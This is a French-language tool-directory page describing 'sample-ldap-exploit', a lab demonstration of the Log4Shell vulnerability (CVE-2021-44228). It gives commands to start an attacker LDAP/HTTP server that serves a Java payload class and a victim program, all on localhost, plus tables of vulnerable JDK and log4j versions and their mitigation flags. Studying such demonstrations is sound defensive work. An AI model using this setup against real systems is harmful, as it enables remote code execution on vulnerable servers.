Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
sample-ldap-exploit — Une courte démonstration de CVE-2021-44228 | Kitploit
Outils/GitHubGitHub/phoswald/sample-ldap-exploit
Analyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et ÉducationDéveloppement de Charges UtilesLabs et PratiqueArchived
GitHubphoswald/sample-ldap-exploit

sample-ldap-exploit

Une courte démonstration de CVE-2021-44228

Voir le dépôt
521il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

sample-ldap-exploit

Une courte démonstration de CVE-2021-44228

Construction

root@kitploit:~
$ mvn clean verify

Exécuter l'attaquant

root@kitploit:~
$ java \
  -cp 'attacker/target/sample-attacker.jar:attacker/target/lib/*' \
  sample.attacker.Attacker localhost 1389 sample.payload.Payload 8080 payload/target/sample-payload.jar

URLs:

  • http://localhost:8080/
  • http://localhost:8080/sample/payload/Payload.class

Exécuter la victime

root@kitploit:~
$ java \
  -cp 'victim/target/sample-victim.jar:victim/target/lib/*' \
  sample.victim.Victim

Résultats

JDK / JRE

VersionStatut
Oracle JDK 8u5vulnérable
OpenJDK 8u312NON vulnérable (sauf si -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)
IBM OpenJDK 8u312-b07 (OpenJ9)NON vulnérable (sauf si -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)
OpenJDK 11.0.7+10NON vulnérable (sauf si -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)
OpenJDK 11.0.13+8NON vulnérable (sauf si -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)
OpenJDK 16+36NON vulnérable (sauf si -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)
OpenJDK 17+35NON vulnérable (sauf si -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)
OpenJDK 17.0.1+12NON vulnérable (sauf si -Dcom.sun.jndi.ldap.object.trustURLCodebase=true)

Si NON vulnérable, une instance de javax.naming.Reference est retournée par javax.naming.Context.lookup().

Si NON vulnérable au chargement de classes depuis des bases de code distantes, d'autres vulnérabilités de désérialisation Java existent probablement toujours!

log4j

VersionStatut
2.9.1vulnérable
2.10.0vulnérable (sauf si -Dlog4j2.formatMsgNoLookups=true ou variable d'environnement LOG4J_FORMAT_MSG_NO_LOOKUPS=true)
2.14.1vulnérable (sauf si -Dlog4j2.formatMsgNoLookups=true ou variable d'environnement LOG4J_FORMAT_MSG_NO_LOOKUPS=true)
2.15.0NON vulnérable

Si NON vulnérable, ${jndi:ldap:...} n'est PAS résolu.

Télécharger l’outil